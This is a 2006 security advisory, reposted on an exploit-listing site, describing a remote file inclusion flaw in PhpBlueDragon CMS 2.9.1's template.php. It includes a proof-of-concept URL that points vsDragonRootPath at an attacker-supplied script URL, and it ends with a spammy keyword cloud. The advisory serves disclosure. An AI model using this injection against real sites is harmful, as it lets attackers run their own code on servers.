about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , PhpBlueDragon CMS <= 2.9.1 (template.php) File Include Vulnerability




2006-06-14 PhpBlueDragon CMS <= 2.9.1 (template.php) File Include Vulnerability 
Rated as : High Risk

-----------------------------------------------------
Advisory id: FSA:015

Author:    Federico Fazzi
Date:      14/06/2006, 18:20
Sinthesis: PhpBlueDragon CMS 2.9.1, File inclusion vulnerability
Type:      high
Product:   http://phpbluedragon.net/
Patch:     unavailable
-----------------------------------------------------


1) Description:

Error occured in template.php, line 23:

---
require($vsDragonRootPath."public_includes/pub_kernel/pbd_template_custom.php");
---

2) Proof of concept:

http://example/[pbd_path]/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=[cmd_url]/
(note this is with final slash (/))

3) Solution:

sanitized $vsDragonRootPath
securitydot.net - 2006-06-14

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 21:52:43 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Site t131t www.privat Nansiy sex guest book SSH-1.99 www.zhendo Www.Sex vi grial glob php-nuke 7 sexy vidoe www.xxxx.c www.xxxliv nuke php.h Apache Mo Www+sex ANAK KULIA lo537l www.CITYTV sms messag Wallpaper asx Vivvo+Arti www.redian nokia 83 worldsex. www89com Www 700xxx nuke+1.0 www.redian fofobucket news for c INDIANISEX hotmuviyou Mom and so japansex. news for c nudemodel o t b m www.388ys. Trishabath Crack Data PHP-Nuke+8 apache-tom downloade nudeimages Invision P School gir cisco fing baike.baid